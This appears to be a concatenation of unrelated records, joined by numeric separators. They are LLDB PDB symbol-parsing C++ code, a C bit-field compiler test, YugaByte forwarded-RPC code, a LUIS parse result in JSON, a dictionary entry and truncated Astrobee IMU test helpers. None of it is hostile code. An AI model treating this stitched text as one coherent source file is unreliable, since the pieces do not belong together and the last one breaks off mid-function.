      // DEBUG_S_FILECHECKSUMS subsection. Those entries then have an index
      // into the global PDB string table.
      auto iter = checksums.at(group.NameIndex);
      if (iter == checksums.end())
        continue;
      llvm::Expected<llvm::StringRef> efn =
          strings.getString(iter->FileNameOffset);
      if (!efn) {
        llvm::consumeError(efn.takeError());
        continue;
      }
      // LLDB wants the index of the file in the list of support files.
      auto fn_iter = llvm::find(cci->m_file_list, *efn);
      lldbassert(fn_iter != cci->m_file_list.end());
      uint32_t file_index = std::distance(cci->m_file_list.begin(), fn_iter);
      std::unique_ptr<LineSequence> sequence(
          line_table->CreateLineSequenceContainer());
      lldbassert(!group.LineNumbers.empty());
      for (const LineNumberEntry &entry : group.LineNumbers) {
        AppendLineEntryToSequence(*line_table, *sequence, *cci, virtual_addr,
                                  file_index, *lfh, entry);
      }
      // Close the sequence at the end of the fragment's code range.
      LineInfo last_line(group.LineNumbers.back().Flags);
      TerminateLineSequence(*line_table, *lfh, virtual_addr, file_index,
                            last_line.getEndLine(), std::move(sequence));
    }
  }
  if (line_table->GetSize() == 0)
    return false;
  comp_unit.SetLineTable(line_table.release());
  return true;
}
// Macro debug info is unavailable in the PDB format.
bool SymbolFileNativePDB::ParseDebugMacros(CompileUnit &comp_unit) {
  // PDB doesn't contain information about macros
  return false;
}
// Populates |support_files| from the compiland's source-file list,
// guessing the path style (POSIX vs. Windows) per file from a leading '/'.
bool SymbolFileNativePDB::ParseSupportFiles(CompileUnit &comp_unit,
                                            FileSpecList &support_files) {
  std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
  PdbSymUid cu_id(comp_unit.GetID());
  lldbassert(cu_id.kind() == PdbSymUidKind::Compiland);
  CompilandIndexItem *cci =
      m_index->compilands().GetCompiland(cu_id.asCompiland().modi);
  lldbassert(cci);
  for (llvm::StringRef f : cci->m_file_list) {
    FileSpec::Style style =
        f.startswith("/") ? FileSpec::Style::posix : FileSpec::Style::windows;
    FileSpec spec(f, style);
    support_files.Append(spec);
  }
  return true;
}
// C++ module imports are not representable in PDB yet.
bool SymbolFileNativePDB::ParseImportedModules(
    const SymbolContext &sc, std::vector<SourceModule> &imported_modules) {
  // PDB does not yet support module debug info
  return false;
}
// Ensures the function's top-level block exists. Only that one block is
// counted; nested lexical blocks are not yet parsed here.
size_t SymbolFileNativePDB::ParseBlocksRecursive(Function &func) {
  std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
  GetOrCreateBlock(PdbSymUid(func.GetID()).asCompilandSym());
  // FIXME: Parse child blocks
  return 1;
}
void SymbolFileNativePDB::DumpClangAST(Stream &s) { m_ast->Dump(s); }
// Name-based lookup of global variables via the globals stream. Only
// data, thread-local, and constant symbol kinds are considered; other
// record kinds with a matching name are ignored.
void SymbolFileNativePDB::FindGlobalVariables(
    ConstString name, const CompilerDeclContext &parent_decl_ctx,
    uint32_t max_matches, VariableList &variables) {
  std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
  using SymbolAndOffset = std::pair<uint32_t, llvm::codeview::CVSymbol>;
  std::vector<SymbolAndOffset> results = m_index->globals().findRecordsByName(
      name.GetStringRef(), m_index->symrecords());
  for (const SymbolAndOffset &result : results) {
    VariableSP var;
    switch (result.second.kind()) {
    case SymbolKind::S_GDATA32:
    case SymbolKind::S_LDATA32:
    case SymbolKind::S_GTHREAD32:
    case SymbolKind::S_LTHREAD32:
    case SymbolKind::S_CONSTANT: {
      PdbGlobalSymId global(result.first, false);
      var = GetOrCreateGlobalVariable(global);
      variables.AddVariable(var);
      break;
    }
    default:
      continue;
    }
  }
}
// Name-based function lookup via S_PROCREF / S_LPROCREF records in the
// globals stream. Each hit is resolved to its compiland and materialized
// as a Function in a fresh SymbolContext.
void SymbolFileNativePDB::FindFunctions(
    ConstString name, const CompilerDeclContext &parent_decl_ctx,
    FunctionNameType name_type_mask, bool include_inlines,
    SymbolContextList &sc_list) {
  std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
  // For now we only support lookup by method name.
  if (!(name_type_mask & eFunctionNameTypeMethod))
    return;
  using SymbolAndOffset = std::pair<uint32_t, llvm::codeview::CVSymbol>;
  std::vector<SymbolAndOffset> matches = m_index->globals().findRecordsByName(
      name.GetStringRef(), m_index->symrecords());
  for (const SymbolAndOffset &match : matches) {
    if (match.second.kind() != S_PROCREF && match.second.kind() != S_LPROCREF)
      continue;
    ProcRefSym proc(match.second.kind());
    cantFail(SymbolDeserializer::deserializeAs<ProcRefSym>(match.second, proc));
    // Skip references whose module/offset don't point at a real procedure.
    if (!IsValidRecord(proc))
      continue;
    CompilandIndexItem &cci =
        m_index->compilands().GetOrCreateCompiland(proc.modi());
    SymbolContext sc;
    sc.comp_unit = GetOrCreateCompileUnit(cci).get();
    PdbCompilandSymId func_id(proc.modi(), proc.SymOffset);
    sc.function = GetOrCreateFunction(func_id, *sc.comp_unit).get();
    sc_list.Append(sc);
  }
}
// Regex-based function lookup is not implemented yet.
void SymbolFileNativePDB::FindFunctions(const RegularExpression &regex,
                                        bool include_inlines,
                                        SymbolContextList &sc_list) {}
// Name-based type lookup. Marks this symbol file as searched and
// delegates to FindTypesByName; |name| is treated as a literal string.
void SymbolFileNativePDB::FindTypes(
    ConstString name, const CompilerDeclContext &parent_decl_ctx,
    uint32_t max_matches, llvm::DenseSet<SymbolFile *> &searched_symbol_files,
    TypeMap &types) {
  std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
  if (!name)
    return;
  searched_symbol_files.clear();
  searched_symbol_files.insert(this);
  // There is an assumption 'name' is not a regex
  FindTypesByName(name.GetStringRef(), max_matches, types);
}
// Pattern/context-based type lookup is not implemented yet.
void SymbolFileNativePDB::FindTypes(
    llvm::ArrayRef<CompilerContext> pattern, LanguageSet languages,
    llvm::DenseSet<SymbolFile *> &searched_symbol_files, TypeMap &types) {}
// Resolves every TPI record matching |name| into a Type and inserts the
// successful ones into |types|, capped at |max_matches| (0 = unlimited).
void SymbolFileNativePDB::FindTypesByName(llvm::StringRef name,
                                          uint32_t max_matches,
                                          TypeMap &types) {
  std::vector<TypeIndex> matches = m_index->tpi().findRecordsByName(name);
  if (max_matches > 0 && max_matches < matches.size())
    matches.resize(max_matches);
  for (TypeIndex ti : matches) {
    TypeSP type = GetOrCreateType(ti);
    if (!type)
      continue;
    types.Insert(type);
  }
}
// Exhaustively materializes every type: the whole TPI stream first, then
// typedefs discovered via S_UDT records in the globals stream. Runs once
// per symbol file; subsequent calls return 0.
size_t SymbolFileNativePDB::ParseTypes(CompileUnit &comp_unit) {
  std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
  // Only do the full type scan the first time.
  if (m_done_full_type_scan)
    return 0;
  const size_t old_count = GetTypeList().GetSize();
  LazyRandomTypeCollection &types = m_index->tpi().typeCollection();
  // First process the entire TPI stream.
  for (auto ti = types.getFirst(); ti; ti = types.getNext(*ti)) {
    TypeSP type = GetOrCreateType(*ti);
    if (type)
      (void)type->GetFullCompilerType();
  }
  // Next look for S_UDT records in the globals stream.
  for (const uint32_t gid : m_index->globals().getGlobalsTable()) {
    PdbGlobalSymId global{gid, false};
    CVSymbol sym = m_index->ReadSymbolRecord(global);
    if (sym.kind() != S_UDT)
      continue;
    UDTSym udt = llvm::cantFail(SymbolDeserializer::deserializeAs<UDTSym>(sym));
    // An S_UDT whose name matches its tag record is just the tag itself;
    // only a differing name indicates a genuine typedef.
    bool is_typedef = true;
    if (IsTagRecord(PdbTypeSymId{udt.Type, false}, m_index->tpi())) {
      CVType cvt = m_index->tpi().getType(udt.Type);
      llvm::StringRef name = CVTagRecord::create(cvt).name();
      if (name == udt.Name)
        is_typedef = false;
    }
    if (is_typedef)
      GetOrCreateTypedef(global);
  }
  const size_t new_count = GetTypeList().GetSize();
  m_done_full_type_scan = true;
  return new_count - old_count;
}
// Compile-unit-scope variable parsing is not implemented yet; globals are
// materialized lazily through name/address lookups instead.
size_t
SymbolFileNativePDB::ParseVariablesForCompileUnit(CompileUnit &comp_unit,
                                                  VariableList &variables) {
  PdbSymUid sym_uid(comp_unit.GetID());
  lldbassert(sym_uid.kind() == PdbSymUidKind::Compiland);
  return 0;
}
// Builds a Variable for a local (or parameter) symbol inside |scope_id|'s
// block and caches it in m_local_variables. Returns null when the symbol
// has no usable location or live range.
// NOTE(review): assumes GetCompiland(var_id.modi) and
// GetOrCreateType(var_info.type) succeed; both are dereferenced
// unchecked -- verify upstream guarantees.
VariableSP SymbolFileNativePDB::CreateLocalVariable(PdbCompilandSymId scope_id,
                                                    PdbCompilandSymId var_id,
                                                    bool is_param) {
  ModuleSP module = GetObjectFile()->GetModule();
  Block &block = GetOrCreateBlock(scope_id);
  VariableInfo var_info =
      GetVariableLocationInfo(*m_index, var_id, block, module);
  if (!var_info.location || !var_info.ranges)
    return nullptr;
  CompilandIndexItem *cii = m_index->compilands().GetCompiland(var_id.modi);
  CompUnitSP comp_unit_sp = GetOrCreateCompileUnit(*cii);
  TypeSP type_sp = GetOrCreateType(var_info.type);
  std::string name = var_info.name.str();
  Declaration decl;
  SymbolFileTypeSP sftype =
      std::make_shared<SymbolFileType>(*this, type_sp->GetID());
  ValueType var_scope =
      is_param ? eValueTypeVariableArgument : eValueTypeVariableLocal;
  VariableSP var_sp = std::make_shared<Variable>(
      toOpaqueUid(var_id), name.c_str(), name.c_str(), sftype, var_scope,
      comp_unit_sp.get(), *var_info.ranges, &decl, *var_info.location, false,
      false, false);
  // Parameters get their clang decls created as part of the function type.
  if (!is_param)
    m_ast->GetOrCreateVariableDecl(scope_id, var_id);
  m_local_variables[toOpaqueUid(var_id)] = var_sp;
  return var_sp;
}
// Cache-aware wrapper around CreateLocalVariable (which performs the
// insertion into m_local_variables itself).
VariableSP SymbolFileNativePDB::GetOrCreateLocalVariable(
    PdbCompilandSymId scope_id, PdbCompilandSymId var_id, bool is_param) {
  auto iter = m_local_variables.find(toOpaqueUid(var_id));
  if (iter != m_local_variables.end())
    return iter->second;
  return CreateLocalVariable(scope_id, var_id, is_param);
}
// Builds a typedef Type from an S_UDT record, borrowing the size and
// compiler type of the target. NOTE(review): assumes the target type
// resolves (GetOrCreateType can return null) -- verify.
TypeSP SymbolFileNativePDB::CreateTypedef(PdbGlobalSymId id) {
  CVSymbol sym = m_index->ReadSymbolRecord(id);
  lldbassert(sym.kind() == SymbolKind::S_UDT);
  UDTSym udt = llvm::cantFail(SymbolDeserializer::deserializeAs<UDTSym>(sym));
  TypeSP target_type = GetOrCreateType(udt.Type);
  (void)m_ast->GetOrCreateTypedefDecl(id);
  Declaration decl;
  return std::make_shared<lldb_private::Type>(
      toOpaqueUid(id), this, ConstString(udt.Name),
      target_type->GetByteSize(nullptr), nullptr, target_type->GetID(),
      lldb_private::Type::eEncodingIsTypedefUID, decl,
      target_type->GetForwardCompilerType(),
      lldb_private::Type::ResolveState::Forward);
}
// Cache-aware wrapper around CreateTypedef.
// NOTE(review): presumably CreateTypedef (or a callee) inserts the result
// into m_types; otherwise misses would be re-created each call -- verify.
TypeSP SymbolFileNativePDB::GetOrCreateTypedef(PdbGlobalSymId id) {
  auto iter = m_types.find(toOpaqueUid(id));
  if (iter != m_types.end())
    return iter->second;
  return CreateTypedef(id);
}
// Walks the symbol records inside one lexical scope (a PROC32 or
// BLOCK32), creating local/parameter Variables and recursing into nested
// blocks. Returns the number of variables created in this subtree.
size_t SymbolFileNativePDB::ParseVariablesForBlock(PdbCompilandSymId block_id) {
  Block &block = GetOrCreateBlock(block_id);
  size_t count = 0;
  CompilandIndexItem *cii = m_index->compilands().GetCompiland(block_id.modi);
  CVSymbol sym = cii->m_debug_stream.readSymbolAtOffset(block_id.offset);
  // For a function scope, the signature's parameter count tells us how
  // many leading locals are actually parameters.
  uint32_t params_remaining = 0;
  switch (sym.kind()) {
  case S_GPROC32:
  case S_LPROC32: {
    ProcSym proc(static_cast<SymbolRecordKind>(sym.kind()));
    cantFail(SymbolDeserializer::deserializeAs<ProcSym>(sym, proc));
    CVType signature = m_index->tpi().getType(proc.FunctionType);
    ProcedureRecord sig;
    cantFail(TypeDeserializer::deserializeAs<ProcedureRecord>(signature, sig));
    params_remaining = sig.getParameterCount();
    break;
  }
  case S_BLOCK32:
    break;
  default:
    lldbassert(false && "Symbol is not a block!");
    return 0;
  }
  VariableListSP variables = block.GetBlockVariableList(false);
  if (!variables) {
    variables = std::make_shared<VariableList>();
    block.SetVariableList(variables);
  }
  CVSymbolArray syms = limitSymbolArrayToScope(
      cii->m_debug_stream.getSymbolArray(), block_id.offset);
  // Skip the first record since it's a PROC32 or BLOCK32, and there's
  // no point examining it since we know it's not a local variable.
  // NOTE(review): confirm drop_front() mutates `syms` in place rather
  // than returning a new (discarded) array.
  syms.drop_front();
  auto iter = syms.begin();
  auto end = syms.end();
  while (iter != end) {
    uint32_t record_offset = iter.offset();
    CVSymbol variable_cvs = *iter;
    PdbCompilandSymId child_sym_id(block_id.modi, record_offset);
    ++iter;
    // If this is a block, recurse into its children and then skip it.
    if (variable_cvs.kind() == S_BLOCK32) {
      uint32_t block_end = getScopeEndOffset(variable_cvs);
      count += ParseVariablesForBlock(child_sym_id);
      iter = syms.at(block_end);
      continue;
    }
    bool is_param = params_remaining > 0;
    VariableSP variable;
    switch (variable_cvs.kind()) {
    case S_REGREL32:
    case S_REGISTER:
    case S_LOCAL:
      variable = GetOrCreateLocalVariable(block_id, child_sym_id, is_param);
      if (is_param)
        --params_remaining;
      if (variable)
        variables->AddVariableIfUnique(variable);
      break;
    default:
      break;
    }
  }
  // Pass false for set_children, since we call this recursively so that the
  // children will call this for themselves.
  block.SetDidParseVariables(true, false);
  return count;
}
// Dispatches variable parsing based on the narrowest scope present in
// |sc|: block, then function, then compile unit.
size_t SymbolFileNativePDB::ParseVariablesForContext(const SymbolContext &sc) {
  std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
  lldbassert(sc.function || sc.comp_unit);
  VariableListSP variables;
  if (sc.block) {
    PdbSymUid block_id(sc.block->GetID());
    size_t count = ParseVariablesForBlock(block_id.asCompilandSym());
    return count;
  }
  if (sc.function) {
    // A function's top-level scope is itself a block record.
    PdbSymUid block_id(sc.function->GetID());
    size_t count = ParseVariablesForBlock(block_id.asCompilandSym());
    return count;
  }
  if (sc.comp_unit) {
    variables = sc.comp_unit->GetVariableList(false);
    if (!variables) {
      variables = std::make_shared<VariableList>();
      sc.comp_unit->SetVariableList(variables);
    }
    return ParseVariablesForCompileUnit(*sc.comp_unit, *variables);
  }
  llvm_unreachable("Unreachable!");
}
// Maps a symbol UID to its clang decl; empty CompilerDecl when no decl
// can be created for it.
CompilerDecl SymbolFileNativePDB::GetDeclForUID(lldb::user_id_t uid) {
  if (auto decl = m_ast->GetOrCreateDeclForUid(uid))
    return decl.getValue();
  else
    return CompilerDecl();
}
// Maps a symbol UID to its clang decl context; empty context when none
// exists.
CompilerDeclContext
SymbolFileNativePDB::GetDeclContextForUID(lldb::user_id_t uid) {
  clang::DeclContext *context =
      m_ast->GetOrCreateDeclContextForUid(PdbSymUid(uid));
  if (!context)
    return {};
  return m_ast->ToCompilerDeclContext(*context);
}
// Returns the decl context that lexically contains the entity identified
// by |uid|. Mirrors GetDeclContextForUID by returning an empty context
// instead of dereferencing a null parent (the previous code dereferenced
// GetParentDeclContext's result unchecked).
CompilerDeclContext
SymbolFileNativePDB::GetDeclContextContainingUID(lldb::user_id_t uid) {
  clang::DeclContext *context = m_ast->GetParentDeclContext(PdbSymUid(uid));
  if (!context)
    return {};
  return m_ast->ToCompilerDeclContext(*context);
}
// Resolves a previously vended type UID to its Type, instantiating the
// type on first use. Returns nullptr for TI_NONE and for record kinds
// the plugin cannot translate.
Type *SymbolFileNativePDB::ResolveTypeUID(lldb::user_id_t type_uid) {
  std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
  auto iter = m_types.find(type_uid);
  // lldb should not be passing us non-sensical type uids. the only way it
  // could have a type uid in the first place is if we handed it out, in which
  // case we should know about the type. However, that doesn't mean we've
  // instantiated it yet. We can vend out a UID for a future type. So if the
  // type doesn't exist, let's instantiate it now.
  if (iter != m_types.end())
    return &*iter->second;
  PdbSymUid uid(type_uid);
  lldbassert(uid.kind() == PdbSymUidKind::Type);
  PdbTypeSymId type_id = uid.asTypeSym();
  if (type_id.index.isNoneType())
    return nullptr;
  TypeSP type_sp = CreateAndCacheType(type_id);
  // CreateAndCacheType returns null for untranslatable records;
  // dereferencing the empty shared_ptr below would be undefined behavior.
  if (!type_sp)
    return nullptr;
  return &*type_sp;
}
// VLA-style dynamic array info is not available from PDB.
llvm::Optional<SymbolFile::ArrayInfo>
SymbolFileNativePDB::GetDynamicArrayInfoForUID(
    lldb::user_id_t type_uid, const lldb_private::ExecutionContext *exe_ctx) {
  return llvm::None;
}
// Completes a forward-declared compiler type by lowering its full PDB
// record into the clang AST.
bool SymbolFileNativePDB::CompleteType(CompilerType &compiler_type) {
  clang::QualType qt =
      clang::QualType::getFromOpaquePtr(compiler_type.GetOpaqueQualType());
  return m_ast->CompleteType(qt);
}
// Scope-filtered type enumeration is not implemented yet.
void SymbolFileNativePDB::GetTypes(lldb_private::SymbolContextScope *sc_scope,
                                   TypeClass type_mask,
                                   lldb_private::TypeList &type_list) {}
// Namespace lookup is not implemented yet; always reports "not found".
CompilerDeclContext
SymbolFileNativePDB::FindNamespace(ConstString name,
                                   const CompilerDeclContext &parent_decl_ctx) {
  return {};
}
// Fetches the module's type system for |language| and binds this symbol
// file to it so type queries route back here. Errors pass through.
llvm::Expected<TypeSystem &>
SymbolFileNativePDB::GetTypeSystemForLanguage(lldb::LanguageType language) {
  auto type_system_or_err =
      m_objfile_sp->GetModule()->GetTypeSystemForLanguage(language);
  if (type_system_or_err) {
    type_system_or_err->SetSymbolFile(this);
  }
  return type_system_or_err;
}
// Plugin registry name for the native PDB reader.
ConstString SymbolFileNativePDB::GetPluginName() {
  static ConstString g_name("pdb");
  return g_name;
}
uint32_t SymbolFileNativePDB::GetPluginVersion() { return 1; }
| 22,248 |
extern void exit (int);
/* A 3-bit unsigned bit-field holds only 0..7; wider assignments are
   truncated modulo 8.  */
struct a
{
  unsigned int bitfield : 3;
};
int main()
{
  struct a a;
  /* 131 == 0x83; only the low 3 bits fit, so a.bitfield reads back as 3.  */
  a.bitfield = 131;
  foo (a.bitfield);
  exit (0);
}
/* Verifies the truncated bit-field value arrived intact; aborts on
   mismatch.  NOTE(review): the implicit-int return type and the implicit
   declarations of foo/abort in main are pre-C99 style -- presumably
   intentional for a compiler torture test, so left untouched.  */
foo(unsigned int z)
{
  if (z != 3)
    abort ();
}
| 89 |
3,702 | <reponame>impira/yugabyte-db
// Copyright (c) YugaByte, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
// in compliance with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software distributed under the License
// is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
// or implied. See the License for the specific language governing permissions and limitations
// under the License.
//
#include "yb/client/client.h"
#include "yb/client/client_error.h"
#include "yb/client/client-internal.h"
#include "yb/client/forward_rpc.h"
#include "yb/client/meta_cache.h"
#include "yb/client/table.h"
#include "yb/client/yb_op.h"
#include "yb/common/pgsql_error.h"
#include "yb/common/transaction_error.h"
#include "yb/common/wire_protocol.h"
#include "yb/util/cast.h"
#include "yb/util/debug-util.h"
#include "yb/util/logging.h"
#include "yb/util/yb_pg_errcodes.h"
using namespace std::placeholders;
DECLARE_bool(rpc_dump_all_traces);
DECLARE_bool(collect_end_to_end_traces);
namespace yb {
using std::shared_ptr;
using std::string;
using rpc::Rpc;
using tserver::WriteRequestPB;
using tserver::WriteResponsePB;
using tserver::ReadRequestPB;
using tserver::ReadResponsePB;
using tserver::TabletServerErrorPB;
namespace client {
namespace internal {
// Returns the absolute deadline for a forwarded RPC: now + a fixed 60s budget.
static CoarseTimePoint ComputeDeadline() {
  // TODO(Sudheer) : Make sure we pass the deadline from the PGGate layer and use that here.
  MonoDelta timeout = MonoDelta::FromSeconds(60);
  return CoarseMonoClock::now() + timeout;
}
// Base for RPCs forwarded verbatim to the tablet leader. Holds the original
// request/response pair and the RpcContext used to reply to the caller.
template <class Req, class Resp>
ForwardRpc<Req, Resp>::ForwardRpc(const Req *req, Resp *res,
                                  rpc::RpcContext&& context,
                                  YBConsistencyLevel consistency_level,
                                  YBClient *client)
    : Rpc(ComputeDeadline(), client->messenger(), &client->proxy_cache()),
      req_(req),
      res_(res),
      context_(std::move(context)),
      trace_(new Trace),
      start_(MonoTime::Now()),
      tablet_invoker_(false /* local_tserver_only */,
                      consistency_level,
                      client,
                      this,
                      this,
                      nullptr /* tablet */,
                      nullptr /* table */,
                      mutable_retrier(),
                      trace_.get()) {
}

// Dumps timing and the collected trace when --rpc_dump_all_traces is set.
template <class Req, class Resp>
ForwardRpc<Req, Resp>::~ForwardRpc() {
  if (PREDICT_FALSE(FLAGS_rpc_dump_all_traces)) {
    LOG(INFO) << ToString() << " took "
              << MonoTime::Now().GetDeltaSince(start_).ToMicroseconds()
              << "us. Trace:";
    trace_->Dump(&LOG(INFO), true);
  }
}

// Human-readable description used in logs and traces.
template <class Req, class Resp>
string ForwardRpc<Req, Resp>::ToString() const {
  return Format("$0(tablet: $1, num_attempts: $2)",
                read_only() ? "Read" : "Write",
                req_->tablet_id(),
                num_attempts());
}

// Kicks off (or retries) the RPC. retained_self_ keeps this object alive
// until Finished() runs.
template <class Req, class Resp>
void ForwardRpc<Req, Resp>::SendRpc() {
  TRACE_TO(trace_, "SendRpc() called.");
  retained_self_ = shared_from_this();
  tablet_invoker_.Execute(req_->tablet_id(), num_attempts() > 1);
}

// Completion callback. If the invoker reports the RPC as done (no further
// retries), responds to the original caller and releases the self-reference.
// NOTE(review): RespondSuccess() is called even when new_status is not ok —
// presumably the error was already recorded on the response by Failed();
// confirm against the invoker's contract.
template <class Req, class Resp>
void ForwardRpc<Req, Resp>::Finished(const Status& status) {
  Status new_status = status;
  if (tablet_invoker_.Done(&new_status)) {
    if (new_status.ok()) {
      PopulateResponse();
    }
    context_.RespondSuccess();
    retained_self_.reset();
  }
}

// Records a failure status into the response protobuf's error field.
template <class Req, class Resp>
void ForwardRpc<Req, Resp>::Failed(const Status& status) {
  TabletServerErrorPB *err = res_->mutable_error();
  StatusToPB(status, err->mutable_status());
}
// Forwarded write: always strong consistency. Only PGSQL batches may be
// forwarded (checked below).
ForwardWriteRpc::ForwardWriteRpc(const WriteRequestPB *req,
                                 WriteResponsePB *res,
                                 rpc::RpcContext&& context,
                                 YBClient *client) :
  ForwardRpc(req, res, std::move(context), YBConsistencyLevel::STRONG, client) {
  // Ensure that only PGSQL operations are forwarded.
  DCHECK(!req->redis_write_batch_size() && !req->ql_write_batch_size());
}

ForwardWriteRpc::~ForwardWriteRpc() {
}

// Dispatches the write asynchronously to the resolved tablet server.
void ForwardWriteRpc::SendRpcToTserver(int attempt_num) {
  auto trace = trace_;
  TRACE_TO(trace, "SendRpcToTserver");
  ADOPT_TRACE(trace.get());
  tablet_invoker_.proxy()->WriteAsync(
      *req_, res_, PrepareController(),
      std::bind(&ForwardWriteRpc::Finished, this, Status::OK()));
  TRACE_TO(trace, "RpcDispatched Asynchronously");
}

// Copies any row-data sidecars from the downstream response into the
// context of the original (upstream) RPC.
void ForwardWriteRpc::PopulateResponse() {
  for (const auto& r : res_->pgsql_response_batch()) {
    if (r.has_rows_data_sidecar()) {
      Slice s = CHECK_RESULT(retrier().controller().GetSidecar(r.rows_data_sidecar()));
      context_.AddRpcSidecar(s);
    }
  }
}
// Forwarded read: preserves the consistency level requested by the client.
// Only PGSQL batches may be forwarded (checked below).
ForwardReadRpc::ForwardReadRpc(const ReadRequestPB *req,
                               ReadResponsePB *res,
                               rpc::RpcContext&& context,
                               YBClient *client) :
  ForwardRpc(req, res, std::move(context), req->consistency_level(), client)  {
  // Ensure that only PGSQL operations are forwarded.
  DCHECK(!req->redis_batch_size() && !req->ql_batch_size());
}

ForwardReadRpc::~ForwardReadRpc() {
}

// Dispatches the read asynchronously to the resolved tablet server.
void ForwardReadRpc::SendRpcToTserver(int attempt_num) {
  auto trace = trace_;
  TRACE_TO(trace, "SendRpcToTserver");
  ADOPT_TRACE(trace.get());
  tablet_invoker_.proxy()->ReadAsync(
      *req_, res_, PrepareController(),
      std::bind(&ForwardReadRpc::Finished, this, Status::OK()));
  TRACE_TO(trace, "RpcDispatched Asynchronously");
}

// Copies any row-data sidecars from the downstream response into the
// context of the original (upstream) RPC.
void ForwardReadRpc::PopulateResponse() {
  for (const auto& r : res_->pgsql_batch()) {
    if (r.has_rows_data_sidecar()) {
      Slice s = CHECK_RESULT(retrier().controller().GetSidecar(r.rows_data_sidecar()));
      context_.AddRpcSidecar(s);
    }
  }
}
} // namespace internal
} // namespace client
} // namespace yb
| 2,528 |
425 | {"Sections":[{"Errors":[],"SectionType":"entitySection","Id":"entitySection_product","Body":"","Name":"product","Type":"simple","SynonymsOrPhraseList":[],"Range":{"Start":{"Line":3,"Character":0},"End":{"Line":3,"Character":17}}},{"Errors":[],"SectionType":"entitySection","Id":"entitySection_PREBUILT","Body":"","Name":"PREBUILT","Type":"number","SynonymsOrPhraseList":[],"Range":{"Start":{"Line":5,"Character":0},"End":{"Line":5,"Character":18}}},{"Errors":[],"SectionType":"entitySection","Id":"entitySection_drinks","Body":"","Name":"drinks","Type":"phraseList","SynonymsOrPhraseList":["tea, latte, milk"],"Range":{"Start":{"Line":7,"Character":0},"End":{"Line":8,"Character":23}}},{"Errors":[],"SectionType":"entitySection","Id":"entitySection_product","Body":"","Name":"product","Type":"phraseList","SynonymsOrPhraseList":["a, b, c"],"Range":{"Start":{"Line":10,"Character":0},"End":{"Line":11,"Character":14}}},{"Errors":[],"SectionType":"entitySection","Id":"entitySection_EspressoType","Body":"","Name":"EspressoType","Type":"Blonde ::201=","SynonymsOrPhraseList":["blonde","blond"],"Range":{"Start":{"Line":12,"Character":0},"End":{"Line":14,"Character":12}}}],"Content":"\n\n$product : simple\n\n$PREBUILT : number\n\n$drinks:phraseList\n - tea, latte, milk\n\n$product:phraseList\n - a, b, c\n$EspressoType:Blonde ::201=\n - blonde\n - blond\n","Errors":[]} | 429 |
335 | {
"word": "Labyrinthodont",
"definitions": [
"(of teeth) having the enamel deeply folded to form a labyrinthine structure.",
"Relating to a group of large fossil amphibians of the late Devonian to early Triassic periods having labyrinthodont teeth."
],
"parts-of-speech": "Adjective"
} | 106 |
629 | /* Copyright (c) 2017, United States Government, as represented by the
* Administrator of the National Aeronautics and Space Administration.
*
* All rights reserved.
*
* The Astrobee platform is licensed under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with the
* License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*/
#include "test_utilities.h" // NOLINT
#include <localization_common/logger.h>
#include <localization_common/utilities.h>
#include <msg_conversions/msg_conversions.h>
namespace imu_augmentor {
namespace lc = localization_common;
namespace lm = localization_measurements;
namespace mc = msg_conversions;
// Builds a parameter set suitable for unit tests: zero gravity, identity
// body-to-IMU extrinsics, uniform 0.1 noise sigmas, and standstill enabled.
ImuAugmentorParams DefaultImuAugmentorParams() {
  ImuAugmentorParams params;
  params.gravity = gtsam::Vector3::Zero();
  params.body_T_imu = gtsam::Pose3::identity();
  // Filter params are already default none
  params.filter = imu_integration::ImuFilterParams();
  params.gyro_sigma = 0.1;
  params.accel_sigma = 0.1;
  params.accel_bias_sigma = 0.1;
  params.gyro_bias_sigma = 0.1;
  params.integration_variance = 0.1;
  params.bias_acc_omega_int = 0.1;
  params.standstill_enabled = true;
  return params;
}
// Generates `num_measurements` IMU measurements with the given constant
// acceleration and angular velocity, starting at `start_time` and spaced
// `time_increment` seconds apart.
std::vector<lm::ImuMeasurement> ConstantMeasurements(const Eigen::Vector3d& acceleration,
                                                     const Eigen::Vector3d& angular_velocity,
                                                     const int num_measurements, const lc::Time start_time,
                                                     const double time_increment) {
  std::vector<lm::ImuMeasurement> imu_measurements;
  // Size is known up front; reserve to avoid repeated reallocation.
  imu_measurements.reserve(num_measurements);
  for (int i = 0; i < num_measurements; ++i) {
    const lc::Time time = start_time + i * time_increment;
    imu_measurements.emplace_back(lm::ImuMeasurement(acceleration, angular_velocity, time));
  }
  return imu_measurements;
}

// Convenience wrapper: constant acceleration, zero angular velocity.
std::vector<lm::ImuMeasurement> ConstantAccelerationMeasurements(const Eigen::Vector3d& acceleration,
                                                                 const int num_measurements, const lc::Time start_time,
                                                                 const double time_increment) {
  const Eigen::Vector3d zero_angular_velocity(Eigen::Vector3d::Zero());
  return ConstantMeasurements(acceleration, zero_angular_velocity, num_measurements, start_time, time_increment);
}

// Convenience wrapper: constant angular velocity, zero acceleration.
std::vector<lm::ImuMeasurement> ConstantAngularVelocityMeasurements(const Eigen::Vector3d& angular_velocity,
                                                                    const int num_measurements,
                                                                    const lc::Time start_time,
                                                                    const double time_increment) {
  const Eigen::Vector3d zero_acceleration(Eigen::Vector3d::Zero());
  return ConstantMeasurements(zero_acceleration, angular_velocity, num_measurements, start_time, time_increment);
}
// Integrates a sequence of angular-velocity measurements into an orientation,
// starting from `starting_orientation` at `starting_time`. Measurements at or
// before the current integration time are skipped; each remaining sample is
// applied over the interval since the previous one via the SO(3) exponential.
gtsam::Rot3 IntegrateAngularVelocities(const std::vector<localization_measurements::ImuMeasurement>& imu_measurements,
                                       const gtsam::Rot3& starting_orientation,
